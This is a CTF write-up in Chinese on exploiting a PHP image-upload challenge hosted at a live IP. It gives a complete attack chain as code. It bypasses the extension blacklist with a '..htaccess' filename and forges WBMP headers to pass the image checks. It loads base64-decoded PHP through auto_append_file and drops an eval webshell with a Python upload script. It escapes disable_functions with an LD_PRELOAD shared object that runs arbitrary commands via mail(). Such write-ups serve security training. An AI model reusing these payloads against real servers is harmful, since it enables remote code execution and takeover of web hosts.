官方源码发布(包含docker)
线上环境(目前还能访问)
查看html注释发现http://35.246.234.136/?source
获得源码
<?php
if (isset($_GET["source"]))
die(highlight_file(__FILE__));
session_start();
if (!isset($_SESSION["home"])) {
$_SESSION["home"] = bin2hex(random_bytes(20));
}
$userdir = "images/{$_SESSION["home"]}/";
if (!file_exists($userdir)) {
mkdir($userdir);
}
$disallowed_ext = array(
"php",
"php3",
"php4",
"php5",
"php7",
"pht",
"phtm",
"phtml",
"phar",
"phps",
);
if (isset($_POST["upload"])) {
if ($_FILES['image']['error'] !== UPLOAD_ERR_OK) {
die("yuuuge fail");
}
$tmp_name = $_FILES["image"]["tmp_name"];
$name = $_FILES["image"]["name"];
$parts = explode(".", $name);
$ext = array_pop($parts);
if (empty($parts[0])) {
array_shift($parts);
}
if (count($parts) === 0) {
die("lol filename is empty");
}
if (in_array($ext, $disallowed_ext, TRUE)) {
die("lol nice try, but im not stupid dude...");
}
$image = file_get_contents($tmp_name);
if (mb_strpos($image, "<?") !== FALSE) {
die("why would you need php in a pic.....");
}
if (!exif_imagetype($tmp_name)) {
die("not an image.");
}
$image_size = getimagesize($tmp_name);
if ($image_size[0] !== 1337 || $image_size[1] !== 1337) {
die("lol noob, your pic is not l33t enough");
}
$name = implode(".", $parts);
move_uploaded_file($tmp_name, $userdir . $name . "." . $ext);
}
echo "<h3>Your <a href=$userdir>files</a>:</h3><ul>";
foreach(glob($userdir . "*") as $file) {
echo "<li><a href='$file'>$file</a></li>";
}
echo "</ul>";
?>
<h1>Upload your pics!</h1>
<form method="POST" action="?" enctype="multipart/form-data">
<input type="file" name="image">
<input type="submit" name=upload>
</form>
<!-- /?source -->
先解释几个php函数
array_pop
:array_pop — Pop the element off the end of array
explode
:explode — Split a string by a string
array_shift
:array_shift — Shift an element off the beginning of array
exif_imagetype
:exif_imagetype — Determine the type of an image
getimagesize
:getimagesize — Get the size of an image
implode
:implode — Join array elements with a string
mb_strpos
:mb_strpos — Find position of first occurrence of string in a string
通过读源码,攻击者可以上传文件。上传的文件有很多限制。
文件名必须要包含.
设置了文件后缀黑名单"php","php3","php4","php5","php7","pht","phtm","phtml","phar","phps"
,黑名单非常完善。
php\n
的方式绕过.htaccess
可以通过上传.htaccess
达到其他后缀的效果php/.
方式绕过文件内容不能包含<?
通过php小于7.0的可以通过<script lanague='php'>
绕过
7.0.0 The ASP tags <%, %>, <%=, and the script tag <script language="php"> are removed from PHP.
5.4.0 The tag <?= is always available regardless of the short_open_tag ini setting.
如果能够控制文件名开头可以通过伪协议绕过:php://filter
等
文件要通过exif_imagetype
的检查
图片的height和width要是1337
通过php/.
能够写文件吗?
从上面发现好像能够写文件,但是需要我们控制文件名为xxx.php/.
在上传文件的过程中我们只能够控制filename
但是测试发现当filename改为
wushell.php/.
的时候$name = $_FILES["image"]["name"]
只能为.
,后来又测试了一下通过$_FILES
获取的文件名不能包含/
,他会取最后一个/
后面的内容。所以想通过xxx.php/.
的思路行不通。
然后再试.htaccess
存在可能有戏。
$parts = explode(".", $name);
$ext = array_pop($parts);
if (empty($parts[0])) {
array_shift($parts);
}
if (count($parts) === 0) {
die("lol filename is empty");
}
但是如果我们控制filename
为.htaccess
这是$parts
将为空,难道.htaccess
也不行吗?有个地方比较奇怪
if (empty($parts[0])) {
array_shift($parts);
}
这样做可能会导致最后的filename与从$name = $_FILES["image"]["name"]
不同。
如果我们控制filename
为..htaccess
不就行了吗?
好的到目前为止,我们可以控制最后的文件名为.htaccess
了。
如果能够控制.htaccess
的内容为
AddType application/x-httpd-php .wuwu
即可。
但是这样肯定是不能满足关于图片的哪些检查的。
根据前面的分析,.htaccess
需要满足
AddType application/x-httpd-php .wuwu
如果强行加magic number是不能被正确解析的,可以加注释#
,但是没有magic number为#
。感觉到这时候可以fuzz了
https://github.com/php/php-src/blob/e219ec144ef6682b71e135fd18654ee1bb4676b4/ext/standard/image.c 根据这进行fuzz
PHPAPI const char php_sig_gif[3] = {'G', 'I', 'F'};
PHPAPI const char php_sig_psd[4] = {'8', 'B', 'P', 'S'};
PHPAPI const char php_sig_bmp[2] = {'B', 'M'};
PHPAPI const char php_sig_swf[3] = {'F', 'W', 'S'};
PHPAPI const char php_sig_swc[3] = {'C', 'W', 'S'};
PHPAPI const char php_sig_jpg[3] = {(char) 0xff, (char) 0xd8, (char) 0xff};
PHPAPI const char php_sig_png[8] = {(char) 0x89, (char) 0x50, (char) 0x4e, (char) 0x47,
(char) 0x0d, (char) 0x0a, (char) 0x1a, (char) 0x0a};
PHPAPI const char php_sig_tif_ii[4] = {'I','I', (char)0x2A, (char)0x00};
PHPAPI const char php_sig_tif_mm[4] = {'M','M', (char)0x00, (char)0x2A};
PHPAPI const char php_sig_jpc[3] = {(char)0xff, (char)0x4f, (char)0xff};
PHPAPI const char php_sig_jp2[12] = {(char)0x00, (char)0x00, (char)0x00, (char)0x0c,
(char)0x6a, (char)0x50, (char)0x20, (char)0x20,
(char)0x0d, (char)0x0a, (char)0x87, (char)0x0a};
PHPAPI const char php_sig_iff[4] = {'F','O','R','M'};
PHPAPI const char php_sig_ico[4] = {(char)0x00, (char)0x00, (char)0x01, (char)0x00};
PHPAPI const char php_sig_riff[4] = {'R', 'I', 'F', 'F'};
PHPAPI const char php_sig_webp[4] = {'W', 'E', 'B', 'P'};
测试发现0x00开头的能满足条件。
所以jp2 和ico能够满足。
ico的长度最多是0xff,为1337是0x539
jp2 只修改header不能改变getimagesize的结果。到这里感觉有点凉凉。
硬着头皮查http://php.net/manual/en/function.exif-imagetype.php#refsect1-function.exif-imagetype-constants
剩下的magic number
查到wbmp可以https://en.wikipedia.org/wiki/Wireless_Application_Protocol_Bitmap_Format
然后用此链接https://image.online-convert.com/convert-to-wbmp生成一个1337*1337大小的图像,然后删除只留`00008A398A39` 这些即可满足type为wbmp长宽高为1337
到这里终于可以写.htaccess
了
但是虽然xxx.wuwu 能够当成php执行了,但是还是不能写<?
解决的方式还是使用伪协议。
php_value auto_append_file "php://filter/convert.base64-decode/resource=shell.wuwu"
会自动include一个php脚本
所以最后的htaccess
AddType application/x-httpd-php .wuwu
php_value auto_append_file "php://filter/convert.base64-decode/resource=shell.wuwu"
import requests
import base64
url = "http://35.246.234.136/?"
header = {"Cookie":"PHPSESSID=58eshi3a265dguf0icnkc6qk5a"}
htaccess = b"""\x00\x00\x8a\x39\x8a\x39
AddType application/x-httpd-php .wuwu
php_value auto_append_file "php://filter/convert.base64-decode/resource=/var/www/html/images/e694a9e3c406b3d8b247d73836958f6303ed7b72/shell.wuwu"
"""
shell = b"\x00\x00\x8a\x39\x8a\x39"+b"00"+ base64.b64encode(b"<?php eval($_GET['c']);?>")
files = [('image',('..htaccess',htaccess,'application/octet-stream'))]
data = {"upload":"Submit"}
proxies = {"http":"http://127.0.0.1:8080"}
print("upload .htaccess")
r = requests.post(url=url, data=data, files=files,headers=header)#proxies=proxies)
# print(r.text)
print("upload shell.wuwu")
files = [('image',('shell.wuwu',shell,'application/octet-stream'))]
r = requests.post(url=url, data=data, files=files,headers=header)
查看phpinfo()
http://35.246.234.136/images/e694a9e3c406b3d8b247d73836958f6303ed7b72/shell.wuwu?c=var_dump(scandir(%27/%27));
发现flag和get_flag,先尝试读取flag
http://35.246.234.136/images/e694a9e3c406b3d8b247d73836958f6303ed7b72/shell.wuwu?c=highlight_file(%27/flag%27);
发现啥都没有,应该是没有权限读
算了,还是先绕过disable fucntion吧
想到了前段时间爆出来的imap_open
绕过disable functionhttps://lab.wallarm.com/rce-in-php-or-how-to-bypass-disable-functions-in-php-installations-6ccdbf4f52bb
https://github.com/Bo0oM/PHP_imap_open_exploit
判断imap_open 是否存在
http://35.246.234.136/images/e694a9e3c406b3d8b247d73836958f6303ed7b72/shell.wuwu?c=var_dump(get_defined_functions());
没有imap_open
mail
存在利用LD_PRELOAD
进行绕过
原理可参见
https://www.tarlogic.com/en/blog/how-to-bypass-disable_functions-and-open_basedir/
参考这个https://github.com/tothi/ctfs/tree/master/alictf-2016/homework 打
/* compile: gcc -Wall -fPIC -shared -o evil.so evil.c -ldl */
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
void payload(char *cmd) {
char buf[512];
strcpy(buf, cmd);
strcat(buf, " > /tmp/_0utput.txt");
system(buf);
}
int geteuid() {
char *cmd;
if (getenv("LD_PRELOAD") == NULL) { return 0; }
unsetenv("LD_PRELOAD");
if ((cmd = getenv("_evilcmd")) != NULL) {
payload(cmd);
}
return 1;
}
上传evil.so
move_uploaded_file($_FILES['evil']['tmp_name'],'/tmp/evil.so');
import requests
url = "http://35.246.234.136/images/e694a9e3c406b3d8b247d73836958f6303ed7b72/shell.wuwu"
param = {"c":"move_uploaded_file($_FILES['evil']['tmp_name'],'/var/www/html/images/e694a9e3c406b3d8b247d73836958f6303ed7b72/shell.php');echo 'ok';var_dump(scandir('/var/www/html/images/e694a9e3c406b3d8b247d73836958f6303ed7b72'));"}
files = [('evil',('evil.so',open("shell.php","rb"),'application/octet-stream'))]
r = requests.post(url=url, files=files, params=param)
print(r.text)
shell.php
<?php
$r1 = putenv("LD_PRELOAD=/var/www/html/images/e694a9e3c406b3d8b247d73836958f6303ed7b72/evil.so");
echo "putenv: $r1 <br>";
$cmd = $_GET['cmd'];
$r2 = putenv("_evilcmd=$cmd");
echo "putenv: $r2 <br>";
$r3 = mail("[email protected]", "", "", "");
echo "mail: $r3 <br>";
highlight_file("/tmp/_0utput.txt");
?>
终于能执行命令了!